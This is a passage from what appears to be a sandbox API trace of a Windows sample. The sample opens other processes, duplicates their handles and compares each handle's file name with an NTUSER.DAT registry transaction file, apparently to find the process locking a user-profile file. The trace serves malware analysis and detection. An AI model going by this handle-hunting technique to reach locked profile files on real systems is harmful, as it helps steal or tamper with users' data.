(_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.945] CloseHandle (hObject=0x680) returned 1 [0153.945] CloseHandle (hObject=0x62c) returned 1 [0153.945] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.945] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xae4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.946] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.947] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.947] CloseHandle (hObject=0x670) returned 1 [0153.947] _wcsicmp (_Str1="\\FXSAPIDebugLogFile.txt", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -8 [0153.947] CloseHandle (hObject=0x680) returned 1 [0153.947] CloseHandle (hObject=0x62c) returned 1 [0153.947] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.947] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xaf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.948] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.948] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.948] CloseHandle (hObject=0x670) returned 1 [0153.948] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.948] CloseHandle (hObject=0x680) returned 1 [0153.949] CloseHandle (hObject=0x62c) returned 1 [0153.949] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.949] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xccc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.949] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.950] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.950] CloseHandle (hObject=0x670) returned 1 [0153.950] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.950] CloseHandle (hObject=0x680) returned 1 [0153.950] CloseHandle (hObject=0x62c) returned 1 [0153.950] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.950] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.951] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.951] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.951] CloseHandle (hObject=0x670) returned 1 [0153.952] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.952] CloseHandle (hObject=0x680) returned 1 [0153.952] CloseHandle (hObject=0x62c) returned 1 [0153.952] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.952] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.952] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.954] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.954] CloseHandle (hObject=0x670) returned 1 [0153.954] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.954] CloseHandle (hObject=0x680) returned 1 [0153.954] CloseHandle (hObject=0x62c) returned 1 [0153.954] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.954] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd44, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.955] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.956] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.956] CloseHandle (hObject=0x670) returned 1 [0153.956] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.956] CloseHandle (hObject=0x680) returned 1 [0153.956] CloseHandle (hObject=0x62c) returned 1 [0153.956] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.956] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd54, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.957] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.958] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.958] CloseHandle (hObject=0x670) returned 1 [0153.958] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.958] CloseHandle (hObject=0x680) returned 1 [0153.958] CloseHandle (hObject=0x62c) returned 1 [0153.958] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.958] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.959] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.959] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.959] CloseHandle (hObject=0x670) returned 1 [0153.959] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.959] CloseHandle (hObject=0x680) returned 1 [0153.959] CloseHandle (hObject=0x62c) returned 1 [0153.959] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.959] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.960] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.960] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.961] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.961] CloseHandle (hObject=0x670) returned 1 [0153.961] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0153.961] CloseHandle (hObject=0x680) returned 1 [0153.961] CloseHandle (hObject=0x62c) returned 1 [0153.961] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.961] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.961] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.962] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.963] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.963] CloseHandle (hObject=0x670) returned 1 [0153.963] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.963] CloseHandle (hObject=0x680) returned 1 [0153.963] CloseHandle (hObject=0x62c) returned 1 [0153.963] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.963] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.964] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.964] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.965] CloseHandle (hObject=0x670) returned 1 [0153.965] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.965] CloseHandle (hObject=0x680) returned 1 [0153.965] CloseHandle (hObject=0x62c) returned 1 [0153.965] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.965] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1294, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.966] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.966] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.966] CloseHandle (hObject=0x670) returned 1 [0153.966] _wcsicmp (_Str1="\\ActionCenter.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.967] CloseHandle (hObject=0x680) returned 1 [0153.967] CloseHandle (hObject=0x62c) returned 1 [0153.967] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.967] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.967] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.968] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.968] CloseHandle (hObject=0x670) returned 1 [0153.968] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.968] CloseHandle (hObject=0x680) returned 1 [0153.968] CloseHandle (hObject=0x62c) returned 1 [0153.968] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.968] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1308, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.969] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.969] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.969] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.970] CloseHandle (hObject=0x670) returned 1 [0153.970] CloseHandle (hObject=0x680) returned 1 [0153.970] CloseHandle (hObject=0x62c) returned 1 [0153.970] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0153.970] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.970] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.970] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.980] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.980] CloseHandle (hObject=0x670) returned 1 [0153.980] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.980] CloseHandle (hObject=0x680) returned 1 [0153.980] CloseHandle (hObject=0x62c) returned 1 [0153.980] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0153.980] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.980] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.981] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.981] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.982] CloseHandle (hObject=0x670) returned 1 [0153.982] CloseHandle (hObject=0x680) returned 1 [0153.982] CloseHandle (hObject=0x62c) returned 1 [0153.982] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0153.982] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.982] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.982] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.983] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.983] CloseHandle (hObject=0x670) returned 1 [0153.983] CloseHandle (hObject=0x680) returned 1 [0153.983] CloseHandle (hObject=0x62c) returned 1 [0153.983] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0153.983] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.983] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.984] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.985] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.985] CloseHandle (hObject=0x670) returned 1 [0153.985] CloseHandle (hObject=0x680) returned 1 [0153.985] CloseHandle (hObject=0x62c) returned 1 [0153.985] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0153.985] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.986] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.987] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.987] CloseHandle (hObject=0x670) returned 1 [0153.987] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0153.987] CloseHandle (hObject=0x680) returned 1 [0153.987] CloseHandle (hObject=0x62c) returned 1 [0153.987] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.987] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.988] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.988] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.988] CloseHandle (hObject=0x670) returned 1 [0153.988] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.988] CloseHandle (hObject=0x680) returned 1 [0153.989] CloseHandle (hObject=0x62c) returned 1 [0153.989] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.989] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.989] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.989] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.990] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.990] CloseHandle (hObject=0x670) returned 1 [0153.990] CloseHandle (hObject=0x680) returned 1 [0153.990] CloseHandle (hObject=0x62c) returned 1 [0153.990] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.990] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.990] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.991] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.992] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.992] CloseHandle (hObject=0x670) returned 1 [0153.992] CloseHandle (hObject=0x680) returned 1 [0153.992] CloseHandle (hObject=0x62c) returned 1 [0153.992] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.992] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.993] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.993] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.993] CloseHandle (hObject=0x670) returned 1 [0153.993] CloseHandle (hObject=0x680) returned 1 [0153.993] CloseHandle (hObject=0x62c) returned 1 [0153.993] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.993] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.994] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.994] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.995] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.995] CloseHandle (hObject=0x670) returned 1 [0153.995] CloseHandle (hObject=0x680) returned 1 [0153.995] CloseHandle (hObject=0x62c) returned 1 [0153.995] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.995] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.995] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.996] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.998] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.998] CloseHandle (hObject=0x670) returned 1 [0153.998] CloseHandle (hObject=0x680) returned 1 [0153.998] CloseHandle (hObject=0x62c) returned 1 [0153.998] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.998] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.998] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.999] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.999] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.999] CloseHandle (hObject=0x670) returned 1 [0153.999] CloseHandle (hObject=0x680) returned 1 [0154.000] CloseHandle (hObject=0x62c) returned 1 [0154.000] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0154.000] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x140, 